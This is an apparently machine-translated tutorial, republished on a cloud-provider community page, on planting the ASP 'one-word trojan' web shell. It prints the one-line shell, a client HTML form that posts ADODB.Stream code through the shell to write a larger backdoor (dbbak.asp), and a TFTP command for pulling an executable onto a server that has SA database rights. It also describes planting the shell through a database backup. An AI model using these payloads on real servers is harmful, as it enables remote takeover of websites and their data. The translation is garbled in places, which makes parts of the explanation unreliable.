ASP a Word Trojan Principle analysis _ Trojan Related
Source: Internet
Author: User
Access via HTTP protocol
The use of a word trojan (I only listed 2 kinds):
1. Only database backup scenarios
When the database is backed up as an ASP file, there is no "compile error, missing script shutdown flag%>"
2) SA permission, usually first write a word, figure convenient. (Of course, direct tftp uploads pigeons run, that's quicker)
Tftp-i IP Get Server.exe
A word trojan <%execute request ("a")%> principle:
First of all know
The Execute () function, which is used to execute the ASP code. is responsible for the implementation of our uploaded the horse, the horse to Asp.dll resolution. The code above <%execute request ("a")%> can explain this:
<%
If Request ("a") <> "" Then Execute request ("a")
%>
Executes if a is not empty. What do you do?...
If a!= 0
Now let's take a look at the client:
<form action=http://192.168.0.28/shell.asp method=post>
<textarea name=l cols=120 rows=10 width=45>
Set Lp=server. CreateObject ("ADODB.stream") ' creates the ADODB.stream component ...
Lp.open
lp.type=2
lp.charset= "gb2312"
Lp.writetext request ("P")
Lp.savetofile Server.MapPath ("dbbak.asp"), 2
Lp.close
Set lp=nothing
Response.Redirect "Dbbak.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45> data to be submitted </textarea><BR><center><br>
<input Type=submit value= Submit >
ADODB.stream is responsible for uploading and reading data to the server:
Component: "ADODB.stream"
The following methods are available:
Cancel method
Use the following methods
Object.cancel
Description: Cancels the call to execute a pending asynchronous Execute or Open method.
WriteText method
Use the following methods:
Object.write (Data,[options])
Description: Loads the specified text data into a pair image.
Parameter description: Data is the specified content to be written.
Options are written without specifying the optional parameters as follows:
Adwritechar =0
Adwriteline =1
SaveToFile method
Use the following methods:
Object.savetofile (Filename,[options])
Description: Writes the contents of the image to the file specified by filename
That is, we save the name of the Trojan dbbak.asp
Parameter description: File specified by filename
Options access option, not specified, optional parameters are as follows:
Adsavecreatenotexist =1
Adsavecreateoverwrite =2
Submit a Word Trojan, the value of a is empty wait for a write value access http://www.***.com/**.asp is how the wait process prepares to execute with the Execute () function ...
Create a adodb.stream to write our big horse to the server ...
At the same time, the variable savetofile defined by this component defines the name of our great horse. Dbbak.asp
The Execute () function detects that the value of a is not empty when committed to the server, so it executes our big horse!
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
